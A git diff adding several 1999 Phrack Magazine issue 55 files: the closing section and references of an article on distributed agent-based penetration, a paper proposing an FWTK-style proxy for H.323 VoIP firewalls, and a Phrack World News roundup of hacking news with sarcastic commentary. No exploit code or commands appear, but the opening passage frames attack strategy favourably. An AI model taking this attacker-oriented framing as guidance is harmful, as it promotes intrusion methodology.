+Information chaining would enable the construction of a hierarchical reporting
+and messaging hierarchy, as opposed to the "flat" hierarchy implemented in the
+majority of tools today.
+
+At this time I am aware of no commercial (or free) vulnerability scanners that
+employ a distributed architecture as described.
+
+
+----[  Conclusion
+
+Although some notable remotely programmable embedded agents exist [14] [18]
+[19], they have not been fully utilized in continuation of the remote attack
+paradigm.
+
+Considerable benefits exist for an attacker in utilizing a distributed
+penetration methodology, centered on an agent based approach;  these benefits
+are not dissimilar to the benefits available through the use of distributed, as
+opposed to static, security state and event monitoring tools.
+
+Distributed metastasis is, in comparison to the traditional attack paradigm, a
+non-trivial methodology for computer penetration, the advantages of which are 
+likely only to be considered worth the expenditure in effort by a small
+minority of skilled attackers;  however, strategically - those advantages could
+be significant.
+
+
+----[  References
+
+
+[1]    William R. Cheswick & Steven M. Bellovin, "Firewalls and Internet
+       Security", Addison-Wesley, 1994.
+
+[2]    Andrew J. Stewart, "Evolution in Network Contour Detection", 1999.
+
+[3]    Roland J. Schemers III, "fping", Stanford University, 1992.
+
+[4]    Michael Schiffman & David Goldsmith, "Firewalking - A Traceroute-Like
+       Analysis of IP Packet Responses to Determine Gateway Access Control
+       Lists", Cambridge Technology Partners, 1998. www.packetfactory.net.
+
+[5]    David C. M. Wood, Sean S. Coleman, & Michael F. Schwartz, "Fremont: A
+       System for Discovering Network Characteristics and Problems", University
+       of Colorado, 1993.
+
+[6]    Merit GateD Consortium, "ripquery - query RIP gateways", 1990-1995,
+       www.gated.org.
+
+[7]    Daniel V. Klein, "Foiling the Cracker; A Survey of, and Improvements to
+       Unix Password Security", Proceedings of the 14th DoE Computer Security
+       Group, 1991.
+
+[8]    Aleph One, "Smashing The Stack For Fun And Profit", Phrack Magazine,
+       Volume 7, Issue 49, File 14 of 16, 1996, www.phrack.com.
+
+[9]    Dan Farmer & Wietse Venema, "Improving the Security of Your Site by
+       Breaking Into it", 1993, www.fish.com.
+
+[10]   Michael D. Schiffman, Index, Phrack 53, Volume 8, Issue 53, Article 01
+       of 15, 1998, www.phrack.com.
+
+[11]   Dan Farmer, "COPS", 1989, www.fish.com.
+
+[12]   Michael D. Schiffman, "Libnet", 1999, www.packetfactory.net.
+
+[13]   Stephen Northcutt, "SHADOW Indications Technical Analysis - Coordinated
+       Attacks and Probes", Navel Surface Warfare Center, 1998.
+
+[14]   Michael D. Schiffman, "Project Loki", Phrack 49, File 06 of 16, 1996,
+       www.phrack.com.
+
+[15]   Eugene H. Spafford, "The Internet Worm Program: An Analysis", Purdue
+       University, 1988.
+
+[16]   Dan Farmer & Weitse Venema, "SATAN", 1995, www.fish.com.
+
+[17]   Thomas H. Ptacek & Timothy N. Newsham, "Insertion, Evasion, and Denial
+       of Service: Eluding Network Intrusion Detection", Secure Networks Inc,
+       1998.
+
+[18]   Cult of the Dead Cow, "Back Orifice 2000 (a.k.a. BO2K)", 1999,
+       www.bo2k.com.
+
+[19]   Greg Hogland et al, 1999, www.rootkit.com.
+
+
+----[  EOF
diff --git a/phrack55/17.txt b/phrack55/17.txt
new file mode 100644
index 0000000..e7c0c6d
--- /dev/null
+++ b/phrack55/17.txt
@@ -0,0 +1,298 @@
+-------[  Phrack Magazine --- Vol. 9 | Issue 55 --- 09.09.99 --- 17 of 19  ]
+
+
+--------------------[  Alternative Thinking in H.323 Capable Firewall Design ]
+
+
+--------[  Dan Moniz <dnm@neith.net>  ]
+
+
+To wit:
+
+"Thus it is said that one who knows the enemy and knows himself will not 
+be endangered in a hundred engagements.  One who does not know the enemy but 
+knows himself will sometimes be victorious, sometimes meet with defeat.   One 
+who knows neither the enemy nor himself will invariably be defeated in
+every engagement"
+
+    - Sun Tzu
+    Chou Dynasty, Warring States period of China (circa 403 BC).
+
+"If your own power of insight is strong, the state of affairs of everything
+will be visible to you. Once you have obtained complete independent mastery of
+martial arts, you will be able to figure out the minds of opponents and thus
+find many ways to win. This demands work."
+
+    - Shinmen Musashi no Kami, Fujiwara no Genshin (Miyamoto Musashi)
+    Tokugawa Era, Third Tent Government of Japan (circa 1643 AD). 
+
+"Better one blow with a pickax than a thousand taps with a mattock."
+
+    - Tran Thai Tong (first king of the Tran Dynasty)
+    Tran Dynasty of Vietnam (1225-1400 AD)
+
+
+Abstract:
+
+This paper illustrates some basics about the H.323 standard, then touches on
+H.323 security in the context of network mapping, and posits a possible
+solution, and then compares it with other existing ideas, and ends by
+developing a basic idea framework for said solution.
+
+
+Extended Abstract:
+
+Using H.323 applications leads to severe firewall security and scalability
+issues on all sides.  This paper describes a compromise solution, between
+using HFCI (a one-time Internet Draft work-in-progress [now since expired])
+and a generic but equally function solution such as SOCKS. The prime points
+focused upon include network disclosure and fundamental access control, as
+well as managing the very complicated nature of H.323 connections and contents.
+The paper finishes by presenting an annotated reference list and encourages
+the reader to investigate further into the issue.  The author also proposes
+to develop the proxy noted in the paper and set-up his goals for the project,
+with source code and other notes to be released at a later date in a follow-up
+paper.
+
+
+Introduction:
+
+H.323, an ITU-T standard, is the dominant standard for Voice-over-IP (VoIP)
+that the telecommunications community is considering to build IP based data
+networks for telephony.  The multiplexing ability, the self-healing nature
+of IP networks, and the potential for new value-add services are the main
+reasons telephony is being merged into the data sphere.
+
+All IP networks are insecure.  Because of the ease in which rouge elements
+could be introduced, open network designs are obviously not feasible.  Closed
+network designs also benefit no one, especially when using H.323 since the
+standard is very intensive in the number of connections and the care with
+which they must be handled.
+
+Further information about H.323 is available in the resources we denote at
+the end of this paper.  We assume a basic familiarity with the standard and
+common implementations and H.323 applications.
+
+
+Issue:
+
+H.323 is very port intensive, necessitating four UDP streams (two for RTP and
+two for RTCP), and also has specific guidelines for which ports these have
+to be.  The RTP ports must be adjacent even numbered ports, while the RTCP
+must be adjacent odd numbered ports.  These streams are also very ephemeral,
+so maintaining correct state is a large issue with the UDP end.  H.323 also
+has TCP connections involved with the H.323 call setup and associated parts of
+the call.  
+
+This standard was never intended to connect large scale networks, handle
+issues of local number portability, or to interconnect to untrusted networks.
+When an untrusted network is used in an H.323 peering context, care must be
+taken to note that dial plans are encoded in ASN.1, and the IP network
+architecture must be communicated to every gateway and gatekeeper that will be
+receiving and controlling calls.  For a paranoid RBOC or LEC, this is
+unacceptable.  Therefore, NAT and ASN.1 cleansing must be performed.  A viable
+way to perform accounting of CDR, as well as VAS must be taken into account,
+but it is out the scope of this paper.
+
+Common solutions for H.323 involved opening all UDP ports, obviously a very 
+scary situation.  In 1997, Intel wrote a whitepaper (noted in the bibliography)
+which expresses the issues involved in proxying H.323 in an effective, secure
+fashion.  Recently, an Internet Draft authored by S. Mercer and A. Molitor
+along with M. Hurry and T. Ngo described the H.323 Firewall Control Interface
+(HFCI).  This Internet Draft expired in June 1999, and it was referenced here
+only as a work once in progress.
+
+The HFCI posed the idea of developing a generic API for proxying H.323 in a 
+specialized H.323 Gateway system.  The overall idea was to develop the HFCI
+in such a way that H.323 would be able to open up "pinholes" in the firewall
+rather than necessitating an all-open state on all UDP ports.
+
+Current research and thought into the issue with people in the industry points
+to a growing deprecation of HFCI as a specialized proxy solution and using
+something more generic like SOCKS, since the design of HFCI replicates much of
+SOCKS functionality.
+
+The author poses the idea that a gateway more in the style of FWTK is an
+agreeable and arguably more manageable solution than either a customized
+interface or a generic use proxy solution.  The advantages to this model,
+later explained in detail in this paper, include a compromise between a
+completely generic solution and tailored gateway, easy integration with
+existing firewall installations, and retention of central control.
+
+
+Synthesis:
+
+Having said the above, a (very) brief explanation is needed.  As D. Brent 
+Chapman and Elizabeth D. Zwicky illustrate on pp. 200-205 of _Building
+Internet Firewalls_, some specific differences exist between SOCKS and FWTK 
+style proxying systems.  For the purpose of this paper, it is assumed that
+the details of the proposed HFCI project replicate much of SOCKS'
+functionality applied to a specific environ (that of H.323 and pals), which
+is what research and current discussion with industry engineers suggests.
+
+Furthermore, some are of the belief that an RFC standard like SOCKS benefits 
+H.323 in a more direct fashion, seeing no need for a specialized stand-alone
+solution, and that SOCKS is malleable enough to handle H.323 with a minimum
+of hassle.
+
+This is sound thinking.  Organizations running SOCKS based proxies could
+integrate H.323 applications into their enterprise without having to support
+an entirely new product or interface.  By using existing standards, a lot
+of the overhead is cut down, with the trade off of a little custom
+configuration.
+
+Returning to the differences inherent in SOCKS and FWTK, the following
+comparative checklist is provided:
+
+ > SOCKS is a generic serv-all solution.  Every SOCKS-ified client runs
+   through the SOCKS proxy and connects to the server at the backend.
+
+ > FWTK uses multiple, smaller, application-specific proxies.  Clients
+   connect to their respective FWTK proxy and then connect to the server at
+   the backend.
+
+ > SOCKS relies on modified client code for use with SOCKS.
+
+ > FWTK provides (out-of-box) the ability to use modified client code or
+   modified user procedures for some of the common applications (such as FTP)
+   and specifies one or the other for other (such as modified user procedures 
+   only with telnet).
+
+ > SOCKS is an RFC standard
+
+ > FWTK is an unsupported toolkit distributed under a liberal license from
+   TIS.
+
+There are other differences as well -- the reader is encouraged to download 
+freely available copies of both systems and tinker.
+
+The idea is that H.323 lends itself to a FWTK style application gateway;
+that is, a gateway could be coded to fit into the FWTK in such a way as to
+support H.323. This provides some considerable benefits over using either
+HFCI or SOCKS:
+
+ > FWTK has established the philosophy that a small, provably secure proxy
+   for each common service works well.
+
+ > FWTK's methodology provides for a easily managed firewall setup.  HFCI is 
+   a completely new interface, while FWTK and it's commercial derivative,
+   Gauntlet, have been tested in the field.
+
+ > Load balancing systems could be put in place to have multiple-system
+   firewalls.  Since the FWTK construction is to have an application specific
+   gateway rather than a generic catch-all gateway, one could implement a
+   number of machines, one handling each particular application and its
+   proxy.  This would especially make sense in large organizations who have to 
+   field a large amount of H.323 traffic.
+
+ > FWTK could be implemented on both (all) ends of the network.  Incoming
+   proxies can hand off traffic to the important internal H.323
+   infrastructure which in turn could hand off the "finished product", such
+   as it is, to outgoing only proxies (although this is not necessarily a
+   FWTK specific idea, and could be applied to SOCKS).
+
+ > FWTK's model leans itself to central control, but also to survivability
+   and fault tolerance.  Having a "one proxy to one app" structure ensures
+   that should, say, ftp-gw go down, h323-gw (hypothetical name) would stay
+   up.
+
+ > FWTK promotes a specialized focus in each gateway by the fact that it
+   uses the "one proxy to one app" method.  This means that a highly effective 
+   proxy could be coded to support H.323 in the most efficient manner possible,
+   which was one of the goals of the HFCI proposal, and still integrate nicely
+   with common firewall solutions, which is behind the drive to use SOCKS.
+
+Issues such as the ability to do the required on-the-fly packet
+destruction/reconstruction to avoid network disclosure are addressed in this
+paper only in the context that the proposed FWTK-model proxy solution will
+accomplish this goal, given fast enough hardware and optimized routines.
+The real bottleneck here is in the packet engine.  SOCKS also provides this
+ability.  Hardware issues and the amount of projected traffic are the main
+variables.
+
+The author believes, however, that this proposal shows an acceptable
+compromise between adopting a completely new and specialized interface
+(such as HFCI) and a overly generic solution (SOCKS) whilst still staying
+within the bounds of traditional firewall methodology.
+
+A project is underway now between the author of this paper and a valued
+colleague to develop the solution proposed in this paper and to test it to
+see if the assumptions made above hold true.  Barring licensing restrictions 
+and the expanse of time, a new paper will be published disclosing the
+project's results and any new findings, along with the source code to the
+proposed proxy at the conclusion of the endeavor.
+
+As always, comments are welcomed and encouraged on this work and on the idea 
+in general.
+
+
+Caveats:
+
+This paper does not touch on such other standards competing with H.323 such 
+as SIP.  While research was indeed conducted on SIP and other related
+standards/protocols, they remain outside the scope of this paper.  SIP may
+very well be a better choice for those who wish to enter the world of VoIP
+services.  The author encourages all readers to research the field and develop
+their own solutions.
+
+This paper does not expressly touch on the issue of full network disclosure,
+one of the bigger concerns when using H.323.  The reader is directed to the
+reference list for suitable material. Having said that, the dual gateway
+architecture (one handling in traffic and one handling out traffic) lends
+itself easily to suffice in this concern.  Again, the main problem is in
+handling the ASN.1 issue, and its lack of fixed byte offsets. The author
+suspects this becomes a larger issue only in high-yield situations, and that
+new packet engines are being developed to optimize performance as well as
+correctness which will work to make this less of a concern.
+
+
+References:
+
+1. _H.323 Peering Proxies_ by Kiad <cameo@kiad.net>
+   (URL: http://neith.net/h.323/kiad/proxies.txt)
+
+This paper lays the groundwork for the network disclosure issue and also
+explains the troubles with ASN.1.  Kiad was originally contacted to co-author 
+this paper, but elected to aid the author with supplementary research and
+act as a sounding board, which proved invaluable.  Kiad also contributed by
+lending her expertise to some of the material above.  Without her, this
+paper would not exist.  This work is dedicated to her -- thank you so much, 
+Kiad.
+
+2. _Building Internet Firewalls_ by D. Brent Chapman and Elizabeth
+       D. Zwicky.
+   (ISBN: 1-56592-124-0)
+
+Used as a canonical reference for the differences between SOCKS and
+FWTK.  Unwittingly served as impetus for the FWTK model idea.
+
+3. _The Problems and Pitfalls of Getting H.323 Safely Through Firewalls_ by 
+       Intel.
+   (URL: http://support.intel.com/support/videophone/trial21/h323_wpr.htm)
+   (URL: ftp://ftp.intel.com/pub/H.323/DOCS/h323_and_firewalls_wp.doc)
+
+   (Also: http://support.intel.com/support/videophone/trial21/h323faq.htm)
+
+Preliminary whitepaper describing the core issues with H.323 and interaction
+with firewalls.
+
+4. _H.323 Firewall Control Interface (HFCI)_ by S. Mercer, et. al.
+   (I-D title: <draft-rfced-info-mercer-00.txt>
+
+Please note that this I-D expired in June of 1999 and is referred to here only
+as a work once in progress, not as an official standard.
+
+5. The _Art of War_ by Sun Tzu (translated by Ralph D. Sawyer)
+   (ISBN: 0-8133-1951-X)
+
+6. _The Book of Five Rings_ by Miyamoto Mushashi (translated by Thomas Cleary)
+   (ISBN: 0-87773-868-8)
+
+7. _Zen Keys_ by Thich Nhat Hanh
+   (ISBN: 0-385-47561-6)
+
+Inspirational materials, all worth reading.
+
+
+----[  EOF
+
diff --git a/phrack55/18.txt b/phrack55/18.txt
new file mode 100644
index 0000000..fd3fcd1
--- /dev/null
+++ b/phrack55/18.txt
@@ -0,0 +1,476 @@
+-------[  Phrack Magazine --- Vol. 9 | Issue 55 --- 09.09.99 --- 17 of 19  ]
+
+
+-------------------------[  P H R A C K     W O R L D     N E W S  ]
+
+
+--------[  disorder <jericho@attrition.org>  ]
+
+Like I said in Phrack 54, the increase of news on the net, security,
+hackers and other PWN topics, it is getting more difficult to keep Phrack
+readers informed of everything.  To combat this problem, PWN will include
+more articles, but only relevant portions (or the parts I want to make
+smart ass remarks about).  If you would like to read the full article,
+look through the ISN (InfoSec News) archives located at: 
+
+	http://www.landfield.com/isn/
+
+If you would like timely news delivered with less smart ass remarks, you
+can always subscribe to ISN by mailing listserv@securityfocus.com with
+
+	'subscribe isn firstname lastname'
+
+in the body of your mail. Another excellent source of daily news is the
+Hacker News Network (HNN @ www.hackernews.com). 
+
+The news included in here are events that occured since the previous
+edition of Phrack World News (Phrack Magazine V. 8, #54, Dec 25th, 1998. 
+ISSN 1068-1035). 
+
+If you feel the need to send me love letters, please cc:
+mcintyre@attrition.org and tell him to "get jiggy on your wiggy". If you
+would like to mail my cat, don't, he hates you because you are pathetic.
+Meow. 
+
+This installment of PWN is dedicated to Federal Agents of Diminished
+Mental Capacity, stupid little kids running canned scripts for lack of
+real skill .. err 'hackers', and blatant stupidity. This issue was brought
+to you by the letters F, U, C, K, O and F. 
+
+--------[  Issue 55
+
+ 0x01: State of Defacements
+ 0x02: L.A. district attorney drops Mitnick case
+ 0x03: Mitnick sentenced, ordered to pay $4,125
+ 0x04: Clinton forms security panel
+ 0x05: Bill reopens encryption access debate
+ 0x06: The Hacker Hoax
+ 0x07: Israeli Teen Finds Web Full of Security Holes 
+ 0x08: Hotmail Hackers: 'We Did It'
+ 0x09: Scientists crack Net security code
+ 0x0a: NSA Lures Hackers
+ 0x0b: Army to offer 'information survival' training
+ 0x0c: Clinton To Use hackers Against Yugoslav leader
+ 0x0d: Hack attack knocks out FBI site
+ 0x0e: White House threatens to punish hackers 
+ 0x0f: MS Refutes Windows 'Spy Key'
+ 0x10: Teens plead innocent in hacking case
+
+0x01>-------------------------------------------------------------------------
+
+State of Defacements
+Attrition
+09.01.99
+
+As of 09.01.99, the following statistics and information has been
+generated based on the mirrors of defaced web sites kept at
+www.attrition.org/mirror/attrition/
+
+The word 'fuck' occured 1269 times in 584 out of 2145 mirrors dating back
+to 95.06.12. 337 defaced pages have linked to or greeted 'attrition', the
+largest mirror of defacements.  Shortly after the Columbine shooting, 37
+defacements made reference to the incident.  To date, 31 defacements have
+made reference to Serbia. 
+
+Average number of website defacements per day since 99.01.01: 3.0.
+Average number of website defacements per day since 99.02.01: 2.5.
+Average number of website defacements per day since 99.03.01: 4.0.
+Average number of website defacements per day since 99.04.01: 8.9.
+Average number of website defacements per day since 99.05.01: 12.7.
+Average number of website defacements per day since 99.06.01: 10.4.
+Average number of website defacements per day since 99.07.01: 10.6.
+Average number of website defacements per day since 99.08.01: 10.3.
+
+Total website defacements in 1995: 4
+Total website defacements in 1996: 18
+Total website defacements in 1997: 39
+Total website defacements in 1998: 194
+Total website defacements in 1999: 1905
+
+Since 08.01.99
+ # of BSDi    : 13			 # of FreeBSD : 9
+ # of HP/UX   : 1			 # of IRIX    : 11
+ # of Linux   : 71			 # of OSF1    : 3
+ # of SCO     : 2			 # of Solaris : 78
+ # of Win-NT  : 109
+
+Since 95.06.12
+com:    1052			net:     124
+org:     140			mil:      52
+gov:     121
+
+The past year has seen many high profile sites defaced. Among them: 
+C-Span (www.c-span.org), EBay (www.ebay.com), ABC News (www.abc.com),
+Symantec (www.symantec.com), The White House (www.whitehouse.gov), The
+Senate (www.senate.gov), GreenPeace (www.greenpeace.org), US Information
+Agency (www.usia.gov), MacWeek (www.macweek.com), HotBot (www.hotbot.com),
+Wired (www.wired.com), and more. Among the armed forces, all branches
+including the Coast Guard have experienced at least one defacement. 
+
+0x02>-------------------------------------------------------------------------
+
+L.A. district attorney drops Mitnick case
+http://www.zdnet.com/zdnn/stories/news/0,4586,2310792,00.html?chkpt=hpqs014
+August 6, 1999
+
+Deputy district attorney says state case was 'mischarged' -- clears way
+for Mitnick halfway house plea. 
+
+[snip...]
+
+In 1993, the district attorney charged Mitnick with one count of illegally
+accessing a Department of Motor Vehicles computer and retrieving
+confidential information. The problem with that charge is that Mitnick,
+posing as a Welfare Fraud investigator, simply picked up a telephone on
+Dec. 24, 1992, and duped an employee accessing the DMV computer for him. 
+
+"Since Mitnick did not personally connect to the DMV computer, but either
+he or someone else communicated with the DMV technician via a telephone
+conversation," Bershin wrote in his motion to dismiss the case, "it would
+be difficult to prove that Mitnick gained entry to the DMV computer, or
+that he instructed or communicated with the logical, arithmetical or
+memory function resources of the DMV computer." 
+
+[snip...]
+
+0x03>-------------------------------------------------------------------------
+
+Mitnick sentenced, ordered to pay $4,125
+August 10, 1999 11:55 AM ET
+http://www.zdnet.com/pcweek/stories/news/0,4153,1015902,00.html
+
+LOS ANGELES -- Four years, five months and 22 days after it began, The
+United States vs. Kevin Mitnick ended Monday when U.S. District Court
+Judge Marianna Pfaelzer sentenced the hacker to 46 months in prison.
+Mitnick was also ordered to pay $4,125 in restitution -- a fraction of the
+$1.5 million federal prosecutors sought. 
+
+With credit for good behavior, Mitnick could be free by January 2000. Once
+released, the hacker is ordered not to touch a computer or cellular
+telephone without the written approval of his probation officer. 
+
+Mitnick is also immediately eligible for release to a halfway house at the
+discretion of the Bureau of Prisons, although the judge recommended he
+serve the remainder of his sentence in prison. 
+
+Mitnick pleaded guilty on March 26 to seven felonies, and admitted to
+cracking computers at cellular telephone companies, software
+manufacturers, ISPs and universities, as well as illegally downloading
+proprietary software from some of the victim companies. 
+
+[snip...]
+
+0x04>-------------------------------------------------------------------------
+
+Clinton forms security panel
+AUGUST 2, 1999 
+http://www.fcw.com/pubs/fcw/1999/0802/fcw-polsecurity-08-2-99.html
+
+President Clinton last month signed an executive order to create the
+National Infrastructure Assurance Council, the final organization to be
+established as part of an overall structure to protect the critical
+infrastructure of the United States against cyberterrorism and other
+attacks. 
+
+[Very timely...]
+
+The council will be made up of 30 people from federal, state and local
+governments, as well as the private sector. As outlined in the May 1998
+Presidential Decision Directive 63, its main purpose is to enhance and
+continue to develop the partnership between the public and private sector
+on initiatives already in place. This includes the Information Sharing and
+Analysis Centers (ISACs) that are being set up across the country to
+exchange information about vulnerabilities, cyberattacks and intrusions. 
+
+[So by the time this council is created, people elected, everything
+ setup.. This is slightly amusing considering the vice-president created
+ the Internet. *smirk*]
+
+[snip...]
+ 
+0x05>-------------------------------------------------------------------------
+
+Bill reopens encryption access debate
+AUGUST 16, 1999 
+http://www.fcw.com/pubs/fcw/1999/0816/fcw-newsencrypt-08-16-99.html
+
+Renewing efforts to allow law enforcement agencies to access and read
+suspected criminals' encrypted electronic files, the Clinton
+administration has drafted a bill that would give those agencies access to
+the electronic "keys"  held by third parties. 
+
+The Cyberspace Electronic Security Act, the drafting of which is being led
+by the Office and Management and Budget and the Justice Department,
+"updates law enforcement and privacy rules for our emerging world of
+widespread cryptography," according to an analysis accompanying the bill
+obtained by Federal Computer Week. 
+
+[Oh yeah, this is them figuring a way to keep our best interests in mind! 
+ Let law enforcement have access to everything, because they are always
+ good and honorable.]
+
+[snip...]
+
+0x06>-------------------------------------------------------------------------
+
+The Hacker Hoax
+August 18, 1999
+http://www.currents.net/newstoday/99/08/18/news3.html
+
+The world's press might have been fooled into believing that a Chinese
+hacker group plans to bring down the country's information infrastructure.
+According to stories that began circulating in July last year, the rogue
+group, the Hong Kong Blondes, is made up of dissidents both overseas and
+within the Chinese Government. 
+
+The rumours began when an interview with the group's leader was published
+by US hacking group the Cult of the Dead Cow (CDC) at
+http://www.cultdeadcow.com . In the interview, illusive Hong Kong Blondes
+director Blondie Wong said that he had formed an organization named the
+Yellow Pages, which would use information warfare to attack China's
+information infrastructure. 
+
+The group threatened to attack both Chinese state organizations and
+Western companies investing in the country. For their part, the CDC
+claimed that they would train the Hong Kong Blondes in encryption and
+intrusion techniques. 
+
+One year after the group's supposed launch, there is no evidence that the
+Hong Kong Blondes ever existed. In fact, all evidence appears to indicate
+that the Hong Kong Blondes report was a highly successful hoax. 
+
+[snip...]
+
+0x07>-------------------------------------------------------------------------
+
+Israeli Teen Finds Web Full of Security Holes 
+August 17, 1999
+http://www.internetnews.com/intl-news/print/0,1089,6_184381,00.html
+
+[Westport, CT] An independent consultant in Israel has released the
+results of one of the first exhaustive surveys of Internet security,
+hoping to provide a wake-up call for Internet companies.
+
+With the help of a piece of homemade scanning software, Liraz Siri probed
+nearly 36 million Internet hosts worldwide over a period of eight months.
+Siri and his program, the Bulk Auditing Security Scanner or BASS, went
+looking specifically for UNIX systems that were vulnerable to 18 widely
+known security vulnerabilities -- holes for which vendors have already
+released patches and other fixes. 
+
+[snip...]
+
+0x08>-------------------------------------------------------------------------
+
+Hotmail Hackers: 'We Did It'
+4:00 p.m.  30.Aug.99.PDT
+http://www.wired.com/news/news/technology/story/21503.html
+
+A previously unknown group known as Hackers Unite has claimed
+responsibility for publicizing Hotmail's security breach, which Microsoft
+vehemently denied was the result of a backdoor oversight. 
+
+The group of eight hackers said Monday through a spokesman that they
+announced the hole to the Swedish media to draw attention to what they say
+is Microsoft's spotty security reputation. 
+
+The stunt exposed every Hotmail email account, estimated to number as many
+as 50 million, to anyone with access to a Web browser.
+
+[snip..]
+
+Microsoft vehemently denied the backdoor suggestions, and instead
+described the problem as "an unknown security issue." 
+
+"There is nothing to these allegations [of a backdoor in Hotmail]," said
+MSN marketing director Rob Bennett. "It is not true. Microsoft values the
+security and privacy of our users above all."
+
+[I think if you sub the "." in that last statement with the word "that",
+ it is much more accurate.]
+
+0x09>-------------------------------------------------------------------------
+
+Scientists crack Net security code
+Aug. 27 
+http://www.msnbc.com/news/305553.asp
+
+A group of scientists claimed Friday to have broken an international
+security code used to protect millions of daily Internet transactions,
+exposing a potentially serious security failure in electronic commerce.
+Researchers working for the National Research Institute for Mathematics
+and Computer Science (CWI) in Amsterdam said consumers and some businesses
+could fall victim to computer hackers if they get their hands on the right
+tools.However, not every computer whiz has access to the equipment, worth
+several million dollars, and no related Internet crimes have yet been
+uncovered, the experts said. 
+  
+The scientists used a Cray 900-16 supercomputer, 300 personal computers
+and specially designed number-crunching software to break the RSA-155 code
+the backbone of encryption codes designed to protect e-mail messages and
+credit-card transactions. 
+
+THE SCIENTISTS USED a Cray 900-16 supercomputer, 300 personal computers
+and specially designed number-crunching software to break the so-called
+RSA-155 code  the backbone of encryption codes designed to protect e-mail
+messages and credit-card transactions. 
+
+Your everyday hacker wont be able to do this, said project director
+Herman te Reile. You have to have extensive capacity, the money, and the
+know-how, but we did it.
+
+[snip...]
+
+0x0a>-------------------------------------------------------------------------
+
+NSA Lures Hackers
+27 August 1999
+http://www.currents.net/clickit/printout/news/28074924000990080.html
+
+There's a future in the National Security Agency for young techies and
+hackers, showing that maybe the Clinton administration is a little
+off-base in its efforts to turn children away from the so-called dark side
+of computer obsession. 
+
+According to a page on the NSA Website, last updated in December 1998, the
+agency is looking for a few good teen-aged hacker-types, promising them
+free college tuition, room and board if they come to work for the agency
+for at least five years upon college graduation. 
+
+The NSA program is not exactly restricted to the dean's list cream of the
+crop, however, requiring only a minimum SAT score of 1200 (or composite
+Act score of 27), a 3.0 grade point average or higher, "demonstration of
+leadership abilities" and US citizenship. 
+
+[snip...]
+
+0x0b>-------------------------------------------------------------------------
+
+Army to offer 'information survival' training
+MAY 5, 1999
+http://www.fcw.com/pubs/fcw/1999/0503/web-army-5-5-99.html
+
+The Army this fall plans to offer an online graduate-level training course
+on information systems survivability, teaching engineers to develop
+systems capable of surviving any kind of technical glitch and network
+attack. 
+
+[Define 'irony'. The army training anyone about security. Lets have a quick
+ look at some public validation for the army and security!
+
+ Date                         Web page defaced
+ ------                       ----------------
+ 99.01.25                     wwwjtuav.redstone.army.mil
+ 99.03.02                     www.bweb.wes.army.mil
+ 99.03.07                     wrair-www.army.mil
+ 99.04.11                     mdw-www.army.mil
+ 99.04.19                     www-anad.army.mil
+ 99.05.01                     www.rsc.stuttgart.army.mil
+ 99.05.03                     www.ett.redstone.army.mil
+ 99.06.04                     cenwo.nwo.usace.army.mil
+ 99.06.24                     www.monmouth.army.mil
+ 99.06.27                     www.army.mil
+ 99.07.16                     www.ado.army.mil
+ 99.08.03                     akamai.tamc.amedd.army.mil
+ 99.08.29                     www.cmtc.7atc.army.mil
+
+Oh yes, sign me up please.]
+
+0x0c>-------------------------------------------------------------------------
+
+Clinton To Use hackers Against Yugoslav leader
+http://www.attrition.org/errata/www/art.0109.html
+
+President Clinton has approved a top-secret plan to destabilize Yugoslav
+leader Slobodan Milosevic, using computer hackers to attack his foreign
+bank accounts and a sabotage campaign to erode his public support,
+
+[Yes, sneaky me. The URL above is part of the Errata page. Why? Because
+ several news outlets blindly reported this as the truth, when it is
+ highly likely it is not. Sensationalism at its finest.]
+
+0x0d>-------------------------------------------------------------------------
+
+Hack attack knocks out FBI site
+May 26, 1999 6:44 PM PT 
+
+A skirmish between the FBI and a well-known hacker group seemingly erupted
+Wednesday. 
+
+Not long after federal agents served search warrants on members of hacker
+group Global Hell (gH), probably in connection with recent attacks on U.S.
+government computers, the FBI's own Web site was attacked and is currently
+offline.
+
+Earlier on Wednesday, MSNBC was told by a member of gH that the FBI had
+served search warrants on several members of the hacker group. Last week,
+gH member Eric Burns (who also goes by the name Zyklon), was arrested in
+connection with three separate attacks on U.S. government computers,
+including systems at the U.S. Information Agency.
+
+[Pay attention journalists. Dozens of you misread this to say the FBI web
+ page was defaced. It clearly says they were victim of a Denial of Service
+ attack.]
+
+0x0e>-------------------------------------------------------------------------
+
+White House threatens to punish hackers 
+June 1, 1999, 3:35 p.m. PT 
+http://www.news.com/News/Item/0,4,37257,00.html
+
+Annoyed by a recent wave of attacks against official U.S. government Web
+sites, the White House today warned hackers who target federal Web sites
+that they will be caught and punished. 
+
+"There's a government-wide effort to make sure that our computer systems
+remain secure," White House Press Secretary Joe Lockhart said in a
+briefing. "For those who think that this is some sort of sport, I think
+[it will be] less fun when the authorities do catch up with them...and
+these people are prosecuted," he said. 
+
+[Busting the people that have already violated your security will
+ not make you secure in the future. Talk about blind to the world.]
+
+0x0f>-------------------------------------------------------------------------
+
+MS Refutes Windows 'Spy Key'
+10:20 a.m.  3.Sep.99.PDT
+http://www.wired.com/news/news/technology/story/21577.html
+
+Microsoft is vehemently denying allegations by a leading cryptographer
+that its Windows platform contains a backdoor designed to give a US
+intelligence agency access to personal computers. 
+
+Andrew Fernandes, chief scientist for security software company Cryptonym
+in North Carolina, claimed on his Web site early Friday that the National
+Security Agency may have access to the core security of most major Windows
+operating systems. 
+
+"By adding the NSA's key, they have made it easier -- not easy, but easier
+-- for the NSA to install security components on your computer without
+your authorization or approval," Fernandes said. 
+
+But Microsoft denied that the NSA has anything to do with the key. 
+
+[Yeah. The NSA isn't bright enough to change the name of a 'backdoor'
+ key from "_NSAKEY" to something a little less glaring.]
+
+0x10>-------------------------------------------------------------------------
+
+Teens plead innocent in hacking case
+09/02/99- Updated 01:34 PM ET
+http://www.usatoday.com/life/cyber/tech/ctg016.htm
+
+JERUSALEM (AP) - Four teen-agers charged with hacking into the computer
+systems of the Pentagon, NASA and the Israeli parliament pleaded innocent
+Thursday, the lawyer for the alleged ringleader said.  Shmuel Tzang said
+his client, Ehud Tenenbaum, 19, broke no law when he penetrated the
+Internet sites of American and Israeli institutions because there was no
+notice on the sites declaring them off-limits. 
+
+[This is patently stupid. Because the systems didn't say "breaking in
+ is illegal", they didn't break the law? This level of stupidity is
+ indicative of the level they showed to get busted.]
+
+
+----[  EOF
diff --git a/phrack55/19.txt b/phrack55/19.txt
new file mode 100644
index 0000000..bb2a1ad
--- /dev/null
+++ b/phrack55/19.txt
@@ -0,0 +1,720 @@
+-------[  Phrack Magazine --- Vol. 9 | Issue 55 --- 09.09.99 --- 19 of 19  ]
+
+
+-------------------------[  Phrack Magzine Extraction Utility  ]
+
+
+--------[  Phrack Staff  ]
+
+
